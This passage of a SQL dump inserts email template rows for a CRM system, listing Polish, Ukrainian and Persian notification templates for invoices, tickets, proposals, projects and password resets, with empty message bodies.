(1333, 'client', 'client-registration-confirmed', 'polish', 'Customer Registration Confirmed [polish]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1334, 'contract', 'contract-signed-to-staff', 'polish', 'Contract Signed (Sent to Staff) [polish]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1335, 'subscriptions', 'customer-subscribed-to-staff', 'polish', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [polish]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1336, 'client', 'contact-verification-email', 'polish', 'Email Verification (Sent to Contact After Registration) [polish]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1337, 'client', 'new-customer-profile-file-uploaded-to-staff', 'polish', 'New Customer Profile File(s) Uploaded (Sent to Staff) [polish]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1338, 'staff', 'event-notification-to-staff', 'polish', 'Event Notification (Calendar) [polish]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1339, 'subscriptions', 'subscription-payment-requires-action', 'polish', 'Credit Card Authorization Required - SCA [polish]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1340, 'invoice', 'invoice-due-notice', 'polish', 'Invoice Due Notice [polish]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1341, 'estimate_request', 'estimate-request-submitted-to-staff', 'polish', 'Estimate Request Submitted (Sent to Staff) [polish]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1342, 'estimate_request', 'estimate-request-assigned', 'polish', 'Estimate Request Assigned (Sent to Staff) [polish]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1343, 'estimate_request', 'estimate-request-received-to-user', 'polish', 'Estimate Request Received (Sent to User) [polish]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1344, 'client', 'new-client-created', 'ukrainian', 'New Contact Added/Registered (Welcome Email) [ukrainian]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1345, 'invoice', 'invoice-send-to-client', 'ukrainian', 'Send Invoice to Customer [ukrainian]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1346, 'ticket', 'new-ticket-opened-admin', 'ukrainian', 'New Ticket Opened (Opened by Staff, Sent to Customer) [ukrainian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1347, 'ticket', 'ticket-reply', 'ukrainian', 'Ticket Reply (Sent to Customer) [ukrainian]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1348, 'ticket', 'ticket-autoresponse', 'ukrainian', 'New Ticket Opened - Autoresponse [ukrainian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1349, 'invoice', 'invoice-payment-recorded', 'ukrainian', 'Invoice Payment Recorded (Sent to Customer) [ukrainian]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1350, 'invoice', 'invoice-overdue-notice', 'ukrainian', 'Invoice Overdue Notice [ukrainian]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1351, 'invoice', 'invoice-already-send', 'ukrainian', 'Invoice Already Sent to Customer [ukrainian]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1352, 'ticket', 'new-ticket-created-staff', 'ukrainian', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [ukrainian]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1353, 'estimate', 'estimate-send-to-client', 'ukrainian', 'Send Estimate to Customer [ukrainian]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1354, 'ticket', 'ticket-reply-to-admin', 'ukrainian', 'Ticket Reply (Sent to Staff) [ukrainian]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1355, 'estimate', 'estimate-already-send', 'ukrainian', 'Estimate Already Sent to Customer [ukrainian]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1356, 'contract', 'contract-expiration', 'ukrainian', 'Contract Expiration Reminder (Sent to Customer Contacts) [ukrainian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1357, 'tasks', 'task-assigned', 'ukrainian', 'New Task Assigned (Sent to Staff) [ukrainian]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1358, 'tasks', 'task-added-as-follower', 'ukrainian', 'Staff Member Added as Follower on Task (Sent to Staff) [ukrainian]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1359, 'tasks', 'task-commented', 'ukrainian', 'New Comment on Task (Sent to Staff) [ukrainian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1360, 'tasks', 'task-added-attachment', 'ukrainian', 'New Attachment(s) on Task (Sent to Staff) [ukrainian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1361, 'estimate', 'estimate-declined-to-staff', 'ukrainian', 'Estimate Declined (Sent to Staff) [ukrainian]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1362, 'estimate', 'estimate-accepted-to-staff', 'ukrainian', 'Estimate Accepted (Sent to Staff) [ukrainian]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1363, 'proposals', 'proposal-client-accepted', 'ukrainian', 'Customer Action - Accepted (Sent to Staff) [ukrainian]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1364, 'proposals', 'proposal-send-to-customer', 'ukrainian', 'Send Proposal to Customer [ukrainian]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1365, 'proposals', 'proposal-client-declined', 'ukrainian', 'Customer Action - Declined (Sent to Staff) [ukrainian]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(1366, 'proposals', 'proposal-client-thank-you', 'ukrainian', 'Thank You Email (Sent to Customer After Accept) [ukrainian]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1367, 'proposals', 'proposal-comment-to-client', 'ukrainian', 'New Comment  (Sent to Customer/Lead) [ukrainian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1368, 'proposals', 'proposal-comment-to-admin', 'ukrainian', 'New Comment (Sent to Staff)  [ukrainian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1369, 'estimate', 'estimate-thank-you-to-customer', 'ukrainian', 'Thank You Email (Sent to Customer After Accept) [ukrainian]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1370, 'tasks', 'task-deadline-notification', 'ukrainian', 'Task Deadline Reminder - Sent to Assigned Members [ukrainian]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1371, 'contract', 'send-contract', 'ukrainian', 'Send Contract to Customer [ukrainian]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1372, 'invoice', 'invoice-payment-recorded-to-staff', 'ukrainian', 'Invoice Payment Recorded (Sent to Staff) [ukrainian]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1373, 'ticket', 'auto-close-ticket', 'ukrainian', 'Auto Close Ticket [ukrainian]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1374, 'project', 'new-project-discussion-created-to-staff', 'ukrainian', 'New Project Discussion (Sent to Project Members) [ukrainian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1375, 'project', 'new-project-discussion-created-to-customer', 'ukrainian', 'New Project Discussion (Sent to Customer Contacts) [ukrainian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1376, 'project', 'new-project-file-uploaded-to-customer', 'ukrainian', 'New Project File(s) Uploaded (Sent to Customer Contacts) [ukrainian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1377, 'project', 'new-project-file-uploaded-to-staff', 'ukrainian', 'New Project File(s) Uploaded (Sent to Project Members) [ukrainian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1378, 'project', 'new-project-discussion-comment-to-customer', 'ukrainian', 'New Discussion Comment  (Sent to Customer Contacts) [ukrainian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1379, 'project', 'new-project-discussion-comment-to-staff', 'ukrainian', 'New Discussion Comment (Sent to Project Members) [ukrainian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1380, 'project', 'staff-added-as-project-member', 'ukrainian', 'Staff Added as Project Member [ukrainian]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1381, 'estimate', 'estimate-expiry-reminder', 'ukrainian', 'Estimate Expiration Reminder [ukrainian]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1382, 'proposals', 'proposal-expiry-reminder', 'ukrainian', 'Proposal Expiration Reminder [ukrainian]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1383, 'staff', 'new-staff-created', 'ukrainian', 'New Staff Created (Welcome Email) [ukrainian]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1384, 'client', 'contact-forgot-password', 'ukrainian', 'Forgot Password [ukrainian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1385, 'client', 'contact-password-reseted', 'ukrainian', 'Password Reset - Confirmation [ukrainian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1386, 'client', 'contact-set-password', 'ukrainian', 'Set New Password [ukrainian]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1387, 'staff', 'staff-forgot-password', 'ukrainian', 'Forgot Password [ukrainian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1388, 'staff', 'staff-password-reseted', 'ukrainian', 'Password Reset - Confirmation [ukrainian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1389, 'project', 'assigned-to-project', 'ukrainian', 'New Project Created (Sent to Customer Contacts) [ukrainian]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1390, 'tasks', 'task-added-attachment-to-contacts', 'ukrainian', 'New Attachment(s) on Task (Sent to Customer Contacts) [ukrainian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1391, 'tasks', 'task-commented-to-contacts', 'ukrainian', 'New Comment on Task (Sent to Customer Contacts) [ukrainian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1392, 'leads', 'new-lead-assigned', 'ukrainian', 'New Lead Assigned to Staff Member [ukrainian]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(1393, 'client', 'client-statement', 'ukrainian', 'Statement - Account Summary [ukrainian]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1394, 'ticket', 'ticket-assigned-to-admin', 'ukrainian', 'New Ticket Assigned (Sent to Staff) [ukrainian]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1395, 'client', 'new-client-registered-to-admin', 'ukrainian', 'New Customer Registration (Sent to admins) [ukrainian]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1396, 'leads', 'new-web-to-lead-form-submitted', 'ukrainian', 'Web to lead form submitted - Sent to lead [ukrainian]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1397, 'staff', 'two-factor-authentication', 'ukrainian', 'Two Factor Authentication [ukrainian]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1398, 'project', 'project-finished-to-customer', 'ukrainian', 'Project Marked as Finished (Sent to Customer Contacts) [ukrainian]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1399, 'credit_note', 'credit-note-send-to-client', 'ukrainian', 'Send Credit Note To Email [ukrainian]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1400, 'tasks', 'task-status-change-to-staff', 'ukrainian', 'Task Status Changed (Sent to Staff) [ukrainian]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1401, 'tasks', 'task-status-change-to-contacts', 'ukrainian', 'Task Status Changed (Sent to Customer Contacts) [ukrainian]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1402, 'staff', 'reminder-email-staff', 'ukrainian', 'Staff Reminder Email [ukrainian]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1403, 'contract', 'contract-comment-to-client', 'ukrainian', 'New Comment  (Sent to Customer Contacts) [ukrainian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1404, 'contract', 'contract-comment-to-admin', 'ukrainian', 'New Comment (Sent to Staff)  [ukrainian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1405, 'subscriptions', 'send-subscription', 'ukrainian', 'Send Subscription to Customer [ukrainian]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1406, 'subscriptions', 'subscription-payment-failed', 'ukrainian', 'Subscription Payment Failed [ukrainian]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1407, 'subscriptions', 'subscription-canceled', 'ukrainian', 'Subscription Canceled (Sent to customer primary contact) [ukrainian]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1408, 'subscriptions', 'subscription-payment-succeeded', 'ukrainian', 'Subscription Payment Succeeded (Sent to customer primary contact) [ukrainian]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1409, 'contract', 'contract-expiration-to-staff', 'ukrainian', 'Contract Expiration Reminder (Sent to Staff) [ukrainian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1410, 'gdpr', 'gdpr-removal-request', 'ukrainian', 'Removal Request From Contact (Sent to administrators) [ukrainian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1411, 'gdpr', 'gdpr-removal-request-lead', 'ukrainian', 'Removal Request From Lead (Sent to administrators) [ukrainian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1412, 'client', 'client-registration-confirmed', 'ukrainian', 'Customer Registration Confirmed [ukrainian]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1413, 'contract', 'contract-signed-to-staff', 'ukrainian', 'Contract Signed (Sent to Staff) [ukrainian]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1414, 'subscriptions', 'customer-subscribed-to-staff', 'ukrainian', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [ukrainian]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1415, 'client', 'contact-verification-email', 'ukrainian', 'Email Verification (Sent to Contact After Registration) [ukrainian]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1416, 'client', 'new-customer-profile-file-uploaded-to-staff', 'ukrainian', 'New Customer Profile File(s) Uploaded (Sent to Staff) [ukrainian]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1417, 'staff', 'event-notification-to-staff', 'ukrainian', 'Event Notification (Calendar) [ukrainian]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1418, 'subscriptions', 'subscription-payment-requires-action', 'ukrainian', 'Credit Card Authorization Required - SCA [ukrainian]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1419, 'invoice', 'invoice-due-notice', 'ukrainian', 'Invoice Due Notice [ukrainian]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1420, 'estimate_request', 'estimate-request-submitted-to-staff', 'ukrainian', 'Estimate Request Submitted (Sent to Staff) [ukrainian]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1421, 'estimate_request', 'estimate-request-assigned', 'ukrainian', 'Estimate Request Assigned (Sent to Staff) [ukrainian]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1422, 'estimate_request', 'estimate-request-received-to-user', 'ukrainian', 'Estimate Request Received (Sent to User) [ukrainian]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1423, 'client', 'new-client-created', 'persian', 'New Contact Added/Registered (Welcome Email) [persian]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1424, 'invoice', 'invoice-send-to-client', 'persian', 'Send Invoice to Customer [persian]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1425, 'ticket', 'new-ticket-opened-admin', 'persian', 'New Ticket Opened (Opened by Staff, Sent to Customer) [persian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1426, 'ticket', 'ticket-reply', 'persian', 'Ticket Reply (Sent to Customer) [persian]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1427, 'ticket', 'ticket-autoresponse', 'persian', 'New Ticket Opened - Autoresponse [persian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1428, 'invoice', 'invoice-payment-recorded', 'persian', 'Invoice Payment Recorded (Sent to Customer) [persian]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1429, 'invoice', 'invoice-overdue-notice', 'persian', 'Invoice Overdue Notice [persian]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1430, 'invoice', 'invoice-already-send', 'persian', 'Invoice Already Sent to Customer [persian]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1431, 'ticket', 'new-ticket-created-staff', 'persian', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [persian]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1432, 'estimate', 'estimate-send-to-client', 'persian', 'Send Estimate to Customer [persian]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1433, 'ticket', 'ticket-reply-to-admin', 'persian', 'Ticket Reply (Sent to Staff) [persian]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1434, 'estimate', 'estimate-already-send', 'persian', 'Estimate Already Sent to Customer [persian]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1435, 'contract', 'contract-expiration', 'persian', 'Contract Expiration Reminder (Sent to Customer Contacts) [persian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1436, 'tasks', 'task-assigned', 'persian', 'New Task Assigned (Sent to Staff) [persian]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1437, 'tasks', 'task-added-as-follower', 'persian', 'Staff Member Added as Follower on Task (Sent to Staff) [persian]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1438, 'tasks', 'task-commented', 'persian', 'New Comment on Task (Sent to Staff) [persian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1439, 'tasks', 'task-added-attachment', 'persian', 'New Attachment(s) on Task (Sent to Staff) [persian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1440, 'estimate', 'estimate-declined-to-staff', 'persian', 'Estimate Declined (Sent to Staff) [persian]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1441, 'estimate', 'estimate-accepted-to-staff', 'persian', 'Estimate Accepted (Sent to Staff) [persian]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1442, 'proposals', 'proposal-client-accepted', 'persian', 'Customer Action - Accepted (Sent to Staff) [persian]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1443, 'proposals', 'proposal-send-to-customer', 'persian', 'Send Proposal to Customer [persian]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1444, 'proposals', 'proposal-client-declined', 'persian', 'Customer Action - Declined (Sent to Staff) [persian]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1445, 'proposals', 'proposal-client-thank-you', 'persian', 'Thank You Email (Sent to Customer After Accept) [persian]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1446, 'proposals', 'proposal-comment-to-client', 'persian', 'New Comment  (Sent to Customer/Lead) [persian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1447, 'proposals', 'proposal-comment-to-admin', 'persian', 'New Comment (Sent to Staff)  [persian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1448, 'estimate', 'estimate-thank-you-to-customer', 'persian', 'Thank You Email (Sent to Customer After Accept) [persian]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1449, 'tasks', 'task-deadline-notification', 'persian', 'Task Deadline Reminder - Sent to Assigned Members [persian]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1450, 'contract', 'send-contract', 'persian', 'Send Contract to Customer [persian]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1451, 'invoice', 'invoice-payment-recorded-to-staff', 'persian', 'Invoice Payment Recorded (Sent to Staff) [persian]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1452, 'ticket', 'auto-close-ticket', 'persian', 'Auto Close Ticket [persian]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1453, 'project', 'new-project-discussion-created-to-staff', 'persian', 'New Project Discussion (Sent to Project Members) [persian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1454, 'project', 'new-project-discussion-created-to-customer', 'persian', 'New Project Discussion (Sent to Customer Contacts) [persian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1455, 'project', 'new-project-file-uploaded-to-customer', 'persian', 'New Project File(s) Uploaded (Sent to Customer Contacts) [persian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1456, 'project', 'new-project-file-uploaded-to-staff', 'persian', 'New Project File(s) Uploaded (Sent to Project Members) [persian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1457, 'project', 'new-project-discussion-comment-to-customer', 'persian', 'New Discussion Comment  (Sent to Customer Contacts) [persian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1458, 'project', 'new-project-discussion-comment-to-staff', 'persian', 'New Discussion Comment (Sent to Project Members) [persian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1459, 'project', 'staff-added-as-project-member', 'persian', 'Staff Added as Project Member [persian]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1460, 'estimate', 'estimate-expiry-reminder', 'persian', 'Estimate Expiration Reminder [persian]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1461, 'proposals', 'proposal-expiry-reminder', 'persian', 'Proposal Expiration Reminder [persian]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1462, 'staff', 'new-staff-created', 'persian', 'New Staff Created (Welcome Email) [persian]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1463, 'client', 'contact-forgot-password', 'persian', 'Forgot Password [persian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1464, 'client', 'contact-password-reseted', 'persian', 'Password Reset - Confirmation [persian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1465, 'client', 'contact-set-password', 'persian', 'Set New Password [persian]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1466, 'staff', 'staff-forgot-password', 'persian', 'Forgot Password [persian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1467, 'staff', 'staff-password-reseted', 'persian', 'Password Reset - Confirmation [persian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1468, 'project', 'assigned-to-project', 'persian', 'New Project Created (Sent to Customer Contacts) [persian]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1469, 'tasks', 'task-added-attachment-to-contacts', 'persian', 'New Attachment(s) on Task (Sent to Customer Contacts) [persian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1470, 'tasks', 'task-commented-to-contacts', 'persian', 'New Comment on Task (Sent to Customer Contacts) [persian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1471, 'leads', 'new-lead-assigned', 'persian', 'New Lead Assigned to Staff Member [persian]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(1472, 'client', 'client-statement', 'persian', 'Statement - Account Summary [persian]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1473, 'ticket', 'ticket-assigned-to-admin', 'persian', 'New Ticket Assigned (Sent to Staff) [persian]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1474, 'client', 'new-client-registered-to-admin', 'persian', 'New Customer Registration (Sent to admins) [persian]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1475, 'leads', 'new-web-to-lead-form-submitted', 'persian', 'Web to lead form submitted - Sent to lead [persian]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1476, 'staff', 'two-factor-authentication', 'persian', 'Two Factor Authentication [persian]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1477, 'project', 'project-finished-to-customer', 'persian', 'Project Marked as Finished (Sent to Customer Contacts) [persian]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1478, 'credit_note', 'credit-note-send-to-client', 'persian', 'Send Credit Note To Email [persian]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1479, 'tasks', 'task-status-change-to-staff', 'persian', 'Task Status Changed (Sent to Staff) [persian]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1480, 'tasks', 'task-status-change-to-contacts', 'persian', 'Task Status Changed (Sent to Customer Contacts) [persian]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1481, 'staff', 'reminder-email-staff', 'persian', 'Staff Reminder Email [persian]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1482, 'contract', 'contract-comment-to-client', 'persian', 'New Comment  (Sent to Customer Contacts) [persian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1483, 'contract', 'contract-comment-to-admin', 'persian', 'New Comment (Sent to Staff)  [persian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1484, 'subscriptions', 'send-subscription', 'persian', 'Send Subscription to Customer [persian]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1485, 'subscriptions', 'subscription-payment-failed', 'persian', 'Subscription Payment Failed [persian]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1486, 'subscriptions', 'subscription-canceled', 'persian', 'Subscription Canceled (Sent to customer primary contact) [persian]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1487, 'subscriptions', 'subscription-payment-succeeded', 'persian', 'Subscription Payment Succeeded (Sent to customer primary contact) [persian]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1488, 'contract', 'contract-expiration-to-staff', 'persian', 'Contract Expiration Reminder (Sent to Staff) [persian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1489, 'gdpr', 'gdpr-removal-request', 'persian', 'Removal Request From Contact (Sent to administrators) [persian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1490, 'gdpr', 'gdpr-removal-request-lead', 'persian', 'Removal Request From Lead (Sent to administrators) [persian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
